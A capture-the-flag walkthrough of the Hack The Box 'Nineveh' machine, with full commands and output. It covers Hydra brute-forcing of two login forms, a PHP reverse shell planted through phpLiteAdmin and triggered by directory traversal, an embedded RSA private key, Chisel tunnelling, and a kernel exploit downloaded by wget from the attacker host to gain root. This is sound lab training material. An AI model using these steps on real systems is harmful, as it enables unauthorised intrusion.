The first step was to run Nmap against the Nineveh machine:
# Nmap 7.91 scan initiated Thu Dec 31 08:51:45 2020 as: nmap -oN scan -sC -O -sV -p- 10.10.10.43 Nmap scan report for 10.10.10.43 Host is up (0.042s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 443/tcp open ssl/http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). | ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR | Not valid before: 2017-07-01T15:03:30 |_Not valid after: 2018-07-01T15:03:30 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.10 - 4.11 (91%), Linux 3.12 (91%), Linux 3.13 (91%), Linux 3.13 or 4.2 (91%), Linux 3.16 - 4.6 (91%), Linux 3.2 - 4.9 (91%), Linux 3.8 - 3.11 (91%), Linux 4.2 (91%), Linux 4.4 (91%), Linux 3.16 (90%) No exact OS matches for host (test conditions non-ideal). OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Thu Dec 31 08:56:11 2020 -- 1 IP address (1 host up) scanned in 267.01 seconds
Both ports 80 and 443 appears to be open. I started by browsing to port 80and was presented with the following login page.
I ran Hydra against this login form to see if it had weak credentials:
┌──(root💀kali)-[/home/kali/Documents/nineveh] └─# hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=admin&password=^PASS^&Login=Login:invalid" Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-31 09:45:46 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-form://10.10.10.43:80/department/login.php:username=admin&password=^PASS^&Login=Login:invalid [STATUS] 2618.00 tries/min, 2618 tries in 00:01h, 14341781 to do in 91:19h, 16 active [80][http-post-form] host: 10.10.10.43 login: admin password: 1q2w3e4r5t 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-31 09:47:44
As you can see from the output, I used the RockYou wordlist and the password 1q2w3e4r5t was found for the username admin. I then logged into the admin panel.
The admin interface only contained a single page which included the following note:
Have you fixed the login page yet! hardcoded username and password is really bad idea! check your serect folder to get in! figure it out! this is your challenge Improve the db interface. ~amrois
This not was pulled from a text file stored on the webserver. This was evident by looking at the page URL and seeing the txt file ninevehNotes.txt included
http://10.10.10.43/department/manage.php?notes=files/ninevehNotes.txt
Because there was no more contents on this page for now, I decided to move onto the site hosted on port 443.
This page contains a single image. I ran GoBuster against this page and discovered the db directory:
┌──(root💀kali)-[/home/kali/Documents/nineveh] └─# gobuster dir -w /usr/share/wordlists/dirb/big.txt --url https://10.10.10.43/ -k =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: https://10.10.10.43/ [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirb/big.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2021/01/03 10:33:22 Starting gobuster =============================================================== /.htpasswd (Status: 403) /.htaccess (Status: 403) /db (Status: 301) /server-status (Status: 403) =============================================================== 2021/01/03 10:34:22 Finished ===============================================================
Browsing to this directory brings me to a phpLiteAdmin 1.9 login form.
I then ran Hydra against this login form and discovered password123 was being used.
┌──(root💀kali)-[/home/kali] └─# hydra 10.10.10.43 https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -l admin -P /usr/share/wordlists/rockyou.txt Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-02 10:55:19 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect [443][http-post-form] host: 10.10.10.43 login: admin password: password123 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-01-02 10:56:16
With this password i was successfully able to login to the phpLiteAdmin web interface. I discovered an exploit HERE which allows you to create a new database with a php extension, which you can then execute as remote code. I followed the instructions and created a database from the phpLiteAdmin web interface called test.php. I then opened the table and opened the insert tab and copied the code from /usr/share/webshells/php/ php-reverse-shell.php found by default in Kali. making sure to modify the IP address in the script to match my own. I then inserted this into the database.
By going back to the homepage we can see that the database file (test.php) is stored in /var/tmp/test.php
Now a method is needed to execute this file. I started by starting a netcast listner on port 1234 to capture the reverse shell:
┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes] └─# nc -nvlp 1234 listening on [any] 1234 ...
I went back to the page hosted on port 80 and modified the URL using directory traversal to execute /var/tmp/test.php rather than files/ninevehNotes.txt. by browsing to the following URL:
http://10.10.10.43/department/manage.php?notes=../../../../../../var/tmp/test.php
This however would not work and kept reporting “No Note is selected”. I did find however that if the filename ninevehNotes is included in the request then a different error is shown:
Warning: include(files/ninevehNotes.tx): failed to open stream: No such file or directory in /var/www/html/department/manage.php on line 31 Warning: include(): Failed opening 'files/ninevehNotes.tx' for inclusion (include_path='.:/usr/share/php') in /var/www/html/department/manage.php on line 31
Because of this, I browsed back to the phpLiteAdmin interface and renamed the database to ninevehNotes.php. I then made a request to:
http://10.10.10.43/department/manage.php?notes=../../../../../../var/tmp/ninevehNotes.php
This worked successfully and a reverse shell was captured.
┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes] └─# nc -nvlp 1234 listening on [any] 1234 ... connect to [10.10.14.19] from (UNKNOWN) [10.10.10.43] 49624 Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux 08:35:53 up 3:36, 0 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
I did some browsing around the machine and found that there was a secure_notes folder in /var/www/ssl/secure_notes.
$ dir index.html nineveh.png $ pwd /var/www/ssl/secure_notes $
This page contains the following image:
I downloaded this image to the kali machine with wget and ran strings against it.
┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes] └─# strings nineveh.png -----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5 FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI 3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo 9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl 1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89 P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1 MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7 fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG -----END RSA PRIVATE KEY----- secret/nineveh.pub 0000644 0000041 0000041 00000000620 13126060277 014541 ustar www-data www-data ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R amrois@nineveh.htb
As you can see from the output, embedded in the image is a private RSA key. I extracted this key out of the file and saved it as nin.pub to be used later on.
I next did some more investigation through the reverse shell and found that it was listening on port 22, even though this wasn’t detected by the initial Nmap scan.
$ netstat -ano Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State Timer tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0) tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN off (0.00/0/0) tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN off (0.00/0/0) tcp 0 0 10.10.10.43:34960 10.10.14.19:1234 ESTABLISHED off (0.00/0/0) tcp 0 0 10.10.10.43:443 10.10.14.19:59276 TIME_WAIT timewait (51.58/0/0) tcp 0 0 10.10.10.43:80 10.10.14.19:55812 ESTABLISHED keepalive (7203.23/0/0) tcp6 0 0 :::22 :::* LISTEN off (0.00/0/0) udp 0 0 10.10.10.43:35020 1.1.1.1:53 ESTABLISHED off (0.00/0/0) udp 0 0 10.10.10.43:47875 1.0.0.1:53 ESTABLISHED off (0.00/0/0) Active UNIX domain sockets (servers and established)
I decided to forward this port to my Kali machine so it can be accessed and logged into using the previously captured private key. I started a Chisel server on the kali machine:
┌──(root💀kali)-[/home/kali/Documents/nineveh] └─# ./chisel_1.7.3_linux_amd64 server -p 2700 -reverse -v 2021/01/03 09:36:34 server: Reverse tunnelling enabled 2021/01/03 09:36:34 server: Fingerprint +Vgh/6RQNjjkwJCxTcS9GahcQIIBe9BrBOVhaMH9gZs= 2021/01/03 09:36:34 server: Listening on http://0.0.0.0:2700
I then downloaded the Chisel client to the Nineveh machine and executed that forwarded port 22 to my kali machine on port 2800:
$ ./chisel_1.7.3_linux_amd64 client 10.10.14.19:2700 R:2800:127.0.0.1:22 2021/01/03 08:36:14 client: Connecting to ws://10.10.14.19:2700 2021/01/03 08:36:40 client: Connected (Latency 26.49034ms)
I then logged into the fowarded SSH port from Kali using the nin.pub private key captured before:
┌──(root💀kali)-[/home/kali/Documents/nineveh/secnotes] └─# ssh -i nin.pub amrois@127.0.0.1 -p 2800 Ubuntu 16.04.2 LTS Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 287 packages can be updated. 206 updates are security updates. You have mail. Last login: Mon Jul 3 00:19:59 2017 from 192.168.0.14 amrois@nineveh:~$ ls user.txt amrois@nineveh:~$ cat user.txt [REDACTED]
As you can see, this was successful and was able to capture the user flag. The next step was to esclate privilages. By running “uname -r” I was able to identify the Linux kernel version as 4.4.0-62-generic. There is an exploit available for this kernel that allows privilage exclation. I downloaded the exploit to the Nineveh machine and ran it.
amrois@nineveh:/tmp$ wget http://10.10.14.19:8000/comp --2021-01-03 09:21:39-- http://10.10.14.19:8000/comp Connecting to 10.10.14.19:8000... connected. HTTP request sent, awaiting response... 200 OK Length: 17880 (17K) [application/octet-stream] Saving to: ‘comp’ comp 100%[=======================================================================================================================================>] 17.46K --.-KB/s in 0.02s 2021-01-03 09:21:39 (728 KB/s) - ‘comp’ saved [17880/17880] amrois@nineveh:/tmp$ chmod +x comp amrois@nineveh:/tmp$ ./comp task_struct = ffff880039eb3800 uidptr = ffff88003c7f6d84 spawning root shell root@nineveh:/tmp# cd /root/ root@nineveh:/root# cd Desktop root@nineveh:/root# ls root.txt test.txt vulnScan.sh root@nineveh:/root# cat root.txt [REDACTED]
As you can see from the output, this exploit was successful and I was able to capture the root flag.